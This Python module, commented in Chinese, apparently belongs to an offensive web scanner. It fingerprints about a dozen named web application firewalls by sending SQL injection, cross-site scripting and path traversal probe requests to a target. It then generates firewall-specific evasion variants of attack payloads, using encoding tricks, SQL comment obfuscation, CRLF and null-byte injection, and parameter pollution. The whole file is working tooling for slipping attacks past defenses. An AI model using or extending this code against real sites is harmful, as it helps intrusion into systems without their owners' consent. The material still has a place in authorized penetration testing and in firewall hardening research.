"""WAF 检测与绕过模块 — 识别 Web 应用防火墙并自动生成绕过策略"""

import logging
from typing import Optional

import httpx

logger = logging.getLogger(__name__)

# WAF 指纹签名库
WAF_SIGNATURES: dict[str, dict] = {
    "Cloudflare": {
        "headers": ["cf-ray", "cf-cache-status", "__cfduid", "cf-request-id"],
        "body_patterns": [
            "Attention Required!",
            "Cloudflare Ray ID",
            "Cloudflare-nginx",
            "Just a moment...",
            "检查您的浏览器",
        ],
        "status_codes": [403, 503],
    },
    "AWS WAF / CloudFront": {
        "headers": ["x-amzn-requestid", "x-amz-cf-pop", "x-amz-cf-id", "x-amzn-trace-id"],
        "body_patterns": [
            "Request Blocked",
            "We can't connect to the server",
            "集中火力抵御",
        ],
        "status_codes": [403, 502],
    },
    "ModSecurity": {
        "headers": ["x-powered-by: Mod Security"],
        "body_patterns": [
            "ModSecurity",
            "Not Acceptable",
            "This error was generated by Mod_Security",
            "被 Mod Security 拦截",
        ],
        "status_codes": [406, 403, 501],
    },
    "阿里云 WAF": {
        "headers": ["aliyun", "x-slb", "x-cache", "x-oss-request-id"],
        "body_patterns": [
            "block.help.aliyun.com",
            "请求被拦截",
            "您访问的页面被防护",
            "禁止访问",
        ],
        "status_codes": [403, 405],
    },
    "腾讯云 WAF": {
        "headers": ["x-cos-request-id", "tencent-cdn", "x-tencent"],
        "body_patterns": [
            "waf.tencent-cloud.com",
            "腾讯云 Web 应用防火墙",
            "waf.qcloud.com",
        ],
        "status_codes": [403, 405],
    },
    "百度云加速 (Yunjiasu)": {
        "headers": ["yunjiasu-nginx", "x-bs"],
        "body_patterns": ["云加速", "检测到异常请求"],
        "status_codes": [403],
    },
    "360 网站卫士": {
        "headers": ["x-360-waf", "x-powered-by-360"],
        "body_patterns": ["360", "网站卫士", "安域"],
        "status_codes": [403, 444],
    },
    "SafeLine (长亭)": {
        "headers": ["safeline", "sl-waf"],
        "body_patterns": ["SafeLine", "请求被拦截", "长亭 SafeLine"],
        "status_codes": [403, 444],
    },
    "Wordfence": {
        "headers": ["x-wordfence"],
        "body_patterns": ["Wordfence", "Generated by Wordfence"],
        "status_codes": [403, 503],
    },
    "F5 BIG-IP ASM": {
        "headers": ["x-connection", "x-asm-request-id"],
        "body_patterns": ["The requested URL was rejected", "Support ID"],
        "status_codes": [403, 404],
    },
    "Akamai": {
        "headers": ["x-akamai-transformed", "x-akamai-request-id"],
        "body_patterns": ["Reference #", "AkamaiGHost"],
        "status_codes": [403],
    },
    "Imperva Incapsula": {
        "headers": ["x-iinfo", "incap_s", "visid_incap"],
        "body_patterns": ["Incapsula", "imperva", "_Incapsula_Resource"],
        "status_codes": [403, 509],
    },
    "Safedog (安全狗)": {
        "headers": ["x-powered-by", "safedog"],
        "body_patterns": ["safedog", "安全狗", "Safedog"],
        "status_codes": [403],
    },
    "USM / 绿盟": {
        "headers": [],
        "body_patterns": ["NSFOCUS", "USM", "绿盟", "WAF"],
        "status_codes": [403],
    },
}


class WAFDetector:
    """WAF 检测器 — 识别目标前方的 WAF 并生成绕过策略"""

    def __init__(self):
        self.logger = logging.getLogger(__name__)
        self.detected_waf: str = ""
        self.all_detected: list[str] = []
        self.confidence: float = 0.0

    async def detect(self, client: httpx.AsyncClient, base_url: str) -> str:
        """检测目标是否存在 WAF

        Args:
            client: 共享 httpx client
            base_url: 目标基础 URL

        Returns:
            检测到的 WAF 名称，未检测到返回空字符串
        """
        # 发送恶意的探测请求触发 WAF
        probes = [
            f"{base_url}/?id=1' OR '1'='1",
            f"{base_url}/?id=<script>alert(1)</script>",
            f"{base_url}/../../../etc/passwd",
            f"{base_url}/?id=1 UNION SELECT NULL--",
        ]

        for probe in probes:
            try:
                resp = await client.get(probe, timeout=10, follow_redirects=False)
                waf = self._analyze_response(probe, resp)
                if waf:
                    if waf not in self.all_detected:
                        self.all_detected.append(waf)
                    self.detected_waf = waf
                    self.confidence = min(1.0, self.confidence + 0.35)
            except Exception:
                continue

        # 也检查一个正常请求的 header
        try:
            resp = await client.get(base_url, timeout=10)
            waf = self._analyze_response(base_url, resp)
            if waf and waf not in self.all_detected:
                self.all_detected.append(waf)
        except Exception:
            pass

        if self.detected_waf:
            self.logger.info("检测到 WAF: %s (可信度 %.0f%%)",
                             self.detected_waf, self.confidence * 100)
        else:
            self.logger.info("未检测到已知 WAF")

        return self.detected_waf

    def _analyze_response(self, url: str, resp: httpx.Response) -> str:
        """分析响应是否匹配已知 WAF 签名"""
        headers_text = str(resp.headers).lower()
        body_text = resp.text[:5000].lower() if resp.text else ""
        status = resp.status_code

        for waf_name, sigs in WAF_SIGNATURES.items():
            score = 0

            # Header 匹配
            for h in sigs.get("headers", []):
                if h.lower() in headers_text:
                    score += 2

            # Body 匹配
            for p in sigs.get("body_patterns", []):
                if p.lower() in body_text:
                    score += 2

            # 状态码匹配
            if status in sigs.get("status_codes", []):
                score += 1

            if score >= 2:
                return waf_name

        return ""

    def get_bypass_variants(self, payload: str) -> list[tuple[str, str]]:
        """根据检测到的 WAF 生成绕过变种

        Args:
            payload: 原始 payload

        Returns:
            [(变种payload, 变种说明), ...]
        """
        variants = [(payload, "原始")]
        waf = self.detected_waf

        # ---- 通用编码绕过 ----
        # 1. URL 双重编码
        if "%" in payload:
            double_encoded = payload.replace("%", "%25")
            variants.append((double_encoded, "双重 URL 编码"))

        # 2. 大小写混合（对不区分大小写的 WAF）
        mixed_case = "".join(c.upper() if i % 2 else c.lower() for i, c in enumerate(payload))
        variants.append((mixed_case, "大小写混合"))

        # 3. 注释混淆 (MySQL: /**/)
        if "'" in payload or "OR" in payload.upper() or "AND" in payload.upper():
            comment_inject = payload.replace("OR", "O/**/R").replace("or", "o/**/r")
            comment_inject = comment_inject.replace("AND", "A/**/ND").replace("and", "a/**/nd")
            variants.append((comment_inject, "注释混淆 /**/"))

            # 4. 内联注释 (MySQL 专属 /*!*/)
            inline = payload.replace(" UNION", " /*!UNION*/")
            inline = inline.replace(" SELECT", " /*!SELECT*/")
            variants.append((inline, "内联注释 /*!*/"))

        # 5. 16 进制编码
        if "'" in payload or '"' in payload:
            hex_encoded = payload
            for c in ["'", '"', " ", "=", "(", ")"]:
                hex_encoded = hex_encoded.replace(c, f"%{ord(c):02x}")
            variants.append((hex_encoded, "Hex 编码"))

        # ===== WAF 特化绕过 =====
        if waf == "Cloudflare":
            # Cloudflare: 换行注入、协议降级
            if "'" in payload:
                nl_payload = payload.replace("'", "'%0a")
                variants.append((nl_payload, "CF 换行绕过"))
            # 参数污染
            if "=" in payload:
                k, v = payload.split("=", 1)
                variants.append((f"{k}={v}&{k}={v}", "CF 参数污染"))

        elif waf == "ModSecurity":
            # ModSecurity: 分块编码、multipart
            if "' OR" in payload or "<script" in payload:
                # Tab 代替空格
                tab_variant = payload.replace(" ", "\t")
                variants.append((tab_variant, "ModSec Tab 绕过"))
                # NULL 字节
                null_variant = payload.replace(" ", "%00")
                variants.append((null_variant, "ModSec NULL 字节"))

        elif "阿里云" in waf:
            # 阿里云 WAF: 某些 WAF 对特定 User-Agent 宽松
            if "'" in payload:
                # 用反斜杠转义
                escaped = payload.replace("'", "\\'")
                variants.append((escaped, "阿里云反斜杠绕过"))

        elif "腾讯云" in waf:
            # 腾讯云 WAF
            if "'" in payload:
                # URL 编码绕过
                url_payload = payload.replace("'", "%27")
                variants.append((url_payload, "腾讯云 URL 编码绕过"))

        elif "SafeLine" in waf or "长亭" in waf:
            # SafeLine 对某些 CRLF/换行敏感
            if "'" in payload:
                crlf = payload.replace("'", "'%0d%0a")
                variants.append((crlf, "SafeLine CRLF 绕过"))

        return variants

    def get_summary(self) -> str:
        """获取 WAF 检测摘要"""
        if not self.detected_waf:
            return "未检测到 WAF"
        wafs = " + ".join(self.all_detected)
        return f"{wafs} (可信度 {self.confidence*100:.0f}%)"
